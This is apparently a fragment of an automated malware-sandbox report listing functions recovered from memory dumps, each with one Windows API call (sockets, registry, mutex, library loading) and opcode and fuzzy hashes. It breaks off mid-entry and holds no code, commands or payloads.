Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Data2QuirkWorker
String ID:
API String ID: 571283199-0
Opcode ID: bcc6509e1b13723c05ce16cc3ce5fe12ea103b73cfd43af58cadf0bb5dc88a38
Instruction ID: ae57252e3e72c21ebc96e94bc41f9f2a7efb751c3e5796f0936da8d36ebaf858
Opcode Fuzzy Hash: bcc6509e1b13723c05ce16cc3ce5fe12ea103b73cfd43af58cadf0bb5dc88a38
Instruction Fuzzy Hash: B4619774A01A29DFDB64CF28DC94B99BBF1BF48316F1081E6D909A7315D730AE858F05

Uniqueness

Uniqueness Score: -1.00%

Function 20511A81, Relevance: 1.6, APIs: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 20511B4A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 8248468b74b787092b5932e0119b31b6cd2a197e5e88b7044a20f210ffe3e7bc
Instruction ID: 52d9392105086d77a2c1587c672b469ea0dd26df5f4ad5b176ad60ef75fed362
Opcode Fuzzy Hash: 8248468b74b787092b5932e0119b31b6cd2a197e5e88b7044a20f210ffe3e7bc
Instruction Fuzzy Hash: 69419E7240E7C0AFE7138B659C54B56BFB4EF07210F0985DBE9C48F1A3D265A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 20510E82, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20510F2D

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 6cb2f281d35eed3e19fc13a73f236527ec9a4b7886ce387561bc74d5ef814be9
Instruction ID: 53aafc02c85b639f00555c7df2749cc73df5b969bfd8129f1ec9387a0eb483fb
Opcode Fuzzy Hash: 6cb2f281d35eed3e19fc13a73f236527ec9a4b7886ce387561bc74d5ef814be9
Instruction Fuzzy Hash: A8316F7650A3C05FE7138B259C557A1BFB8DF43220F0984DBE9849B1A3D2689949C772

Uniqueness

Uniqueness Score: -1.00%

Function 2051285B, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 2051292F

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 8de99b2b2323af587848a8b3284ae44a93abff1373f4537c4ec501762c26f56e
Instruction ID: 1b64368db11d59e5c55b585e4a5355865c7bfeb4e6969a011676a0b6ae02cee8
Opcode Fuzzy Hash: 8de99b2b2323af587848a8b3284ae44a93abff1373f4537c4ec501762c26f56e
Instruction Fuzzy Hash: 7D31B471004345AFE722CF65CC44FA6FFACEF05310F14499AE9849B192D375A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 20512B0D, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512BC1

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: a44af64ac282a8f7e7762b2228cf8cf8491490a85e6bcc9481c15a25644b5bf7
Instruction ID: 6748967920af9347cb963549ab6234ec73f2672877c6d4e7b7047fa1d4b78014
Opcode Fuzzy Hash: a44af64ac282a8f7e7762b2228cf8cf8491490a85e6bcc9481c15a25644b5bf7
Instruction Fuzzy Hash: 05316FB5109784AFEB228F65DC44F52FFB8EF06314F08849AE9858B163D334E959CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB2A989

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4c60785d6b56cbebc593bd69fea8447871327778933bbc3271ba95f56a01c078
Instruction ID: 080dd3a3c45cd7ac57caf835ea2dc4188be24d3719a721274f35011ac19a197d
Opcode Fuzzy Hash: 4c60785d6b56cbebc593bd69fea8447871327778933bbc3271ba95f56a01c078
Instruction Fuzzy Hash: 0D31B4B2408784AFE7228F15CC84F67FFBCEF05710F08859AE9859B152D224E949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 20510C48, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 20510CE9

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b54d45e1572846d7b60fdb0a95f3da6debf305a48e9cd65ac1f986a7ac48a98f
Instruction ID: 00c8d7d044836e5ca749d4ddb25203265985bc901503758712e2161dc75f97d4
Opcode Fuzzy Hash: b54d45e1572846d7b60fdb0a95f3da6debf305a48e9cd65ac1f986a7ac48a98f
Instruction Fuzzy Hash: 62318BB1505340AFE722CF65DC44F66FFE8EF05220F0889AEE9859B252D375E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 1DB2AA8C

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 85f0c1b0bb4f26a29391b8028fe3abaab9d57672ec4f9aed43c14e3df140e1e8
Instruction ID: 6c0e590a4c376c64743a22b6f9641dd696b1695c9cf773d4d9c4f191d71060b1
Opcode Fuzzy Hash: 85f0c1b0bb4f26a29391b8028fe3abaab9d57672ec4f9aed43c14e3df140e1e8
Instruction Fuzzy Hash: 7B3193725097846FE722CF25CC44F63BFF8EF06710F08849AE9898B153D264E949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 2051157F, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20511634

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8655b63b6be8fda0305ef534f140bd1d2e746b86c822e238681d35c77ff28820
Instruction ID: 282ceca4b5f1cdc34af6fc62ca38fde5c1fcb74dece866f03c5fe0b9beea2939
Opcode Fuzzy Hash: 8655b63b6be8fda0305ef534f140bd1d2e746b86c822e238681d35c77ff28820
Instruction Fuzzy Hash: F73184715093845FEB22CF64CC45B92BFB8AF06310F08859AE9859B153D325E948C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 20511EC0, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 20511F57

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 635eace91ad4d26a800227743d1fb7492d129800000a326ac662b1894669bee3
Instruction ID: 18ad7fe47df86358fa490ac85ae753dc6e804aadc6fd822ac8029ad7847bebaa
Opcode Fuzzy Hash: 635eace91ad4d26a800227743d1fb7492d129800000a326ac662b1894669bee3
Instruction Fuzzy Hash: A7318F72504385AFE7228F65DC45F67BFA8EF05320F0884AAE984CB152D324E949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B464, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 1DB2B4FE

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 17923dd29c07f8035e01c9061320b9f72ad39d0d8fdedc8952894b1d386e9168
Instruction ID: d5c63960054ae75273dd1c259371473262d78937014d5b1beb0bdb4d275db436
Opcode Fuzzy Hash: 17923dd29c07f8035e01c9061320b9f72ad39d0d8fdedc8952894b1d386e9168
Instruction Fuzzy Hash: 2921B6B25093806FE7128F25DC45B56BFB8EF06320F0884AAE985DF193D264E905C761

Uniqueness

Uniqueness Score: -1.00%

Function 20512158, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 2051220A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: b780a1b640d25204ec23f657d46b3996f5b0c1e34782fd4fde6f0025f0b577f5
Instruction ID: ca7de0652dba89febc8463179f33ab7b83c256565225ca90f7bb01459da3abed
Opcode Fuzzy Hash: b780a1b640d25204ec23f657d46b3996f5b0c1e34782fd4fde6f0025f0b577f5
Instruction Fuzzy Hash: 7C31AFB2405780AFE722CB55DC45F56FFF8EF06320F08459AE9848B1A2D375A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 20511DC2, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20511E6C

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 19eae4812873ae9cf53b20f1a125e7c8faeca41c2490fe3a2b09d7029f469d9a
Instruction ID: 4d2eb979b72ca07d7c1d5cc1aa1e7baa44c3a4ce52490c14504052ef4b1a2fc7
Opcode Fuzzy Hash: 19eae4812873ae9cf53b20f1a125e7c8faeca41c2490fe3a2b09d7029f469d9a
Instruction Fuzzy Hash: 4A3180725093806FE722CF65DC44F92BFB8EF06310F0885DAE9859B1A3D264E949C761

Uniqueness

Uniqueness Score: -1.00%

Function 2051240D, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 205124AD

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: f857785a65c222247e2016d4d0b61330e64243982afead8d362b90ed705f912f
Instruction ID: fc10df4af97c30c6fa6bf533f4694e647e4406ec7cfcfbe3d1eb5904318a0f7a
Opcode Fuzzy Hash: f857785a65c222247e2016d4d0b61330e64243982afead8d362b90ed705f912f
Instruction Fuzzy Hash: 413184B1509780AFE722CF65DC45F56FFE8EF05310F08849AE9848B292D375E944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 2051288A, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 2051292F

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: b48a3d7591e457ed96b366c0fefce646cccbd057fb118a3ca03b59329cac7d93
Instruction ID: 16988b5113c0ea0541a99916c2a9b020fe0ae6484adec20e82154e59fbc9135a
Opcode Fuzzy Hash: b48a3d7591e457ed96b366c0fefce646cccbd057fb118a3ca03b59329cac7d93
Instruction Fuzzy Hash: 2B21A1B1500305AFFB31DF59DC85FAAFBACEF04710F14885AEA849A181D674A9898B71

Uniqueness

Uniqueness Score: -1.00%

Function 20511496, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 2051152A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ffcad85c536712a6cb1096eda2a17c1b076a46df31ba994c6a9bbe3e4a406cdc
Instruction ID: 105d385fc4ab40df5b764e6682c8c3b0be0a846d50bc813dd894fb9d53951071
Opcode Fuzzy Hash: ffcad85c536712a6cb1096eda2a17c1b076a46df31ba994c6a9bbe3e4a406cdc
Instruction Fuzzy Hash: 7021BFB2505344AFE7228F65DC45F66FFA8EF45310F0888AAED808B152D274E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A120, Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000EB4,?,?), ref: 1DB2A1C2

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 243627206c5a428c3ecef36525c58866e48c394f73c9e48d54374a39c62adbc4
Instruction ID: c5db945491b55c4333d3fd39e4513c1f9d6a502b14f6ab92e5b542acc5195a6f
Opcode Fuzzy Hash: 243627206c5a428c3ecef36525c58866e48c394f73c9e48d54374a39c62adbc4
Instruction Fuzzy Hash: 1721BF7140D3C06FD7128B358C61BA6BFB4EF47620F1985DBD9C48F193D225A90AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 1DB2B5EE

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 83a129740e8a0b42e9942342f44af1257115a33b444185c4547f6ebcdc09aedb
Instruction ID: 9c2d37175e2ced513f5412eb2c0f629a8352bdee75c59096be7aa34bbfba6733
Opcode Fuzzy Hash: 83a129740e8a0b42e9942342f44af1257115a33b444185c4547f6ebcdc09aedb
Instruction Fuzzy Hash: 6321A6B25053806FE712CF25DC44F67BFB8EF45310F0884AAE945DB152D664E948CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1DB2B6FA

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 6f6cecb4b2c9ec23a77be086d2937d3ee60d2cc858606b720d0ca014ed94ef16
Instruction ID: b1968b42d988cb99ca0bd43c36dc22415c74d41390ebbd068b935e63a86985eb
Opcode Fuzzy Hash: 6f6cecb4b2c9ec23a77be086d2937d3ee60d2cc858606b720d0ca014ed94ef16
Instruction Fuzzy Hash: 0A21AD714093C06FD7128B65CC55B66BFB4EF87610F0984DBD8848B1A3D224A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 205125E8, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512671

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: ae139a6603a32fba6df2ee017118d6bd434ff3fe7d40baffafb88dc48efdbe8f
Instruction ID: b0e448962d2d2e818d11da4dd3cb49fa0b91b0e8f340fe3939626eba2f215217
Opcode Fuzzy Hash: ae139a6603a32fba6df2ee017118d6bd434ff3fe7d40baffafb88dc48efdbe8f
Instruction Fuzzy Hash: 5A21B271105380AFE7228F65DC84F57FFB8EF06310F0884AAE9859B192D634E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 20512076, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 20512101

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 4f7b457afd0c23cdaea36cd3d2213fa28e0906dd18984cf96fdf6fc82bba979d
Instruction ID: a961e96b44753f00d4bb0eac3bdfc5f1b33bc14de0af78e4f39ad6514726c123
Opcode Fuzzy Hash: 4f7b457afd0c23cdaea36cd3d2213fa28e0906dd18984cf96fdf6fc82bba979d
Instruction Fuzzy Hash: F621A3B1505380AFE712CF65DC44F56FFE8EF05210F08849EE9848B252D375E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 205113C4, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 2051146A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 2ee824e472bd5f955ab8ee51a437b2131382c2fd4c2694930db1cfafce190397
Instruction ID: 45ee96a57d0dec39abf1a6c7c42e11dfe2595ec4d0caa715d7c74fefcab27515
Opcode Fuzzy Hash: 2ee824e472bd5f955ab8ee51a437b2131382c2fd4c2694930db1cfafce190397
Instruction Fuzzy Hash: 8621537550E3C46FC3138B358C55A11BFB4EF47610F1D81DFD9848B5A3D225A91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DB2B35E

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 230e6f8e56c3ec40c43cde95f1891b54c5b82704ea068447525012091a42a849
Instruction ID: f79f1f5cb6895fbb4910db0d93d70a615efe1cc62c8cbb1a4f414cd1eac43c56
Opcode Fuzzy Hash: 230e6f8e56c3ec40c43cde95f1891b54c5b82704ea068447525012091a42a849
Instruction Fuzzy Hash: 1D21C8755093C06FD3138B25DC51B62BFB4EF47A10F0981DBE9848B693D225A91AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 20510C6A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 20510CE9

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2de6a2062ddec5ebd237101422765054995e10be96409c30f9a4d666f28e603f
Instruction ID: d0b09f9920e676726bc4ab2508e370c76a8d5776eae757e54af2b3b02c5dcf84
Opcode Fuzzy Hash: 2de6a2062ddec5ebd237101422765054995e10be96409c30f9a4d666f28e603f
Instruction Fuzzy Hash: 64218BB5500700AFE721CFA6D944B56FFE8EF04320F04896AE9849B652E375E944CA61

Uniqueness

Uniqueness Score: -1.00%

Function 205104F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 2051058B

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b12009e2aaf42f4497196837124da3b59b7c52fc7be6fe38bfabdb2ff5be9c0d
Instruction ID: b618aeb2ec6fe3853f2d4008da2ca6c04c34827cce7c9ec376dc6fece47c2341
Opcode Fuzzy Hash: b12009e2aaf42f4497196837124da3b59b7c52fc7be6fe38bfabdb2ff5be9c0d
Instruction Fuzzy Hash: F421C5710493806FE7228F15CC85F96FFB8EF46324F1880DAE9845F193D2A4A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 20511EE6, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 20511F57

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 3c94178eb498a555fe70054eaea86947edada67b3e223cab35ee35eab29a2481
Instruction ID: 82cb78638b7befeed8e30345b7a21f71c50eefbb20000319a57712f531aa2dde
Opcode Fuzzy Hash: 3c94178eb498a555fe70054eaea86947edada67b3e223cab35ee35eab29a2481
Instruction Fuzzy Hash: CD218072600304AFEB209E69DC85F6AFBA8EF04720F14886AED44CB642D774E9458A75

Uniqueness

Uniqueness Score: -1.00%

Function 20512A3A, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512AC3

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 0cc016a73a2402334c1cc4ec5730825f0a905f1ee892851a905f5d8baf2efdd6
Instruction ID: 03e45bab2078200f8fae62c310266fa16ee855aea6840a15b1cd617bb64722eb
Opcode Fuzzy Hash: 0cc016a73a2402334c1cc4ec5730825f0a905f1ee892851a905f5d8baf2efdd6
Instruction Fuzzy Hash: 2A2171B14093846FE7228F659C84B96BFB8EF46310F1884DBE9849F193D274A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB2A989

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ebd4b9c2872921bd8a29431521b50c7d72bcc6044a848c5e97d87da98a51d13c
Instruction ID: 4864939e17d74fabe748939851e837b9ef3c366aca24bf9906d841ee87b241f9
Opcode Fuzzy Hash: ebd4b9c2872921bd8a29431521b50c7d72bcc6044a848c5e97d87da98a51d13c
Instruction Fuzzy Hash: 8321D1B2500704AFE7218F56CC84F6BFBECEF08720F04895AED499B641D234E509CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 2051104A, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 205110C9

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: c0e1cfe9281ce98a3e1011c8a559d2859b36e4b9f2c2aae7bca582c673654d31
Instruction ID: 2cebe031b6a344b1806d085cd19a18a07fa23b5f9868959879c112797ac3f616
Opcode Fuzzy Hash: c0e1cfe9281ce98a3e1011c8a559d2859b36e4b9f2c2aae7bca582c673654d31
Instruction Fuzzy Hash: 9C21A1B2405340AFE7228F55DC44FA7FFA8EF45720F0484AAEA849B152D274A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 20512D06, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512D8A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: c57c96e493e547a9bc2f3b3a3e1910585454d18df73b1b9d133d43fc1818f7aa
Instruction ID: f106d162d602bcccc88b2868104d76ed2f5b16dc61ff10b297678c564f8a44de
Opcode Fuzzy Hash: c57c96e493e547a9bc2f3b3a3e1910585454d18df73b1b9d133d43fc1818f7aa
Instruction Fuzzy Hash: 29217FB24053846FE722CF65DD44F97BFA8EF45320F0888ABE9449B152D634E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 20512DD4, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512E69

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 93a9c5b79bd104921c0c92268bc86b8c24abf4a0681d83fa639061bd2b650874
Instruction ID: cc6c3cb4360e1c5f8d817e81b7d9fcff7b7051fd48337cdd44882b6dbb0ddc97
Opcode Fuzzy Hash: 93a9c5b79bd104921c0c92268bc86b8c24abf4a0681d83fa639061bd2b650874
Instruction Fuzzy Hash: 9D21B6724093846FEB228F15DC45F66FFB8EF46314F09849BE9845B163D275A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 205114B6, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 2051152A

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: fd96e87edae967de81939f7918ddadd9299ac365814ff2098dec2bdf2fe86ccf
Instruction ID: 1b6b67d0044aff8a22f80504780cfb2a084d09cd7d2018f7598773c29d0a2903
Opcode Fuzzy Hash: fd96e87edae967de81939f7918ddadd9299ac365814ff2098dec2bdf2fe86ccf
Instruction Fuzzy Hash: 9D21F3B2500304AFF7219F55DC85F6AFFA8EF44320F14886AED418B242D274E9488A75

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2ACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1DB2AD6A

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9257f66f8d0373da8b9db8f197f853eb310cd9ede07a090eb10040f075b29bc0
Instruction ID: e48e853e828e08161cd70a33b65533187556c58c9e42eb7f91bc4393f4c714eb
Opcode Fuzzy Hash: 9257f66f8d0373da8b9db8f197f853eb310cd9ede07a090eb10040f075b29bc0
Instruction Fuzzy Hash: 562183B65093805FD7528B65DC85B93BFE8EF02210F0984EAD989CF663D234E808C762

Uniqueness

Uniqueness Score: -1.00%

Function 20512B46, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EB4,DA1DF0F7,00000000,00000000,00000000,00000000), ref: 20512BC1

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: e0e39087880ad87ac351b837e0ed68096248d4eca3d65b9a4bf38d75b27c5dda
Instruction ID: dcb6be0db6ef9a3033e17289567a4b6890f8c6089dfd385dff7e587fb77d1b5b
Opcode Fuzzy Hash: e0e39087880ad87ac351b837e0ed68096248d4eca3d65b9a4bf38d75b27c5dda
Instruction Fuzzy Hash: 99216AB5104704AFEB218F55DC84FA6FBE8EF08720F04886AED458B652D734E954CB71

Uniqueness

Uniqueness Score: -1.00%

Function 2051243A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 205124AD

Memory Dump Source

Source File: 00000003.00000002.909761970.0000000020510000.00000040.00000001.sdmp, Offset: 20510000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 085ad533d3bdf7dc4df8315a88133992fd0bb7ca01337e4177273ee60ec39da7
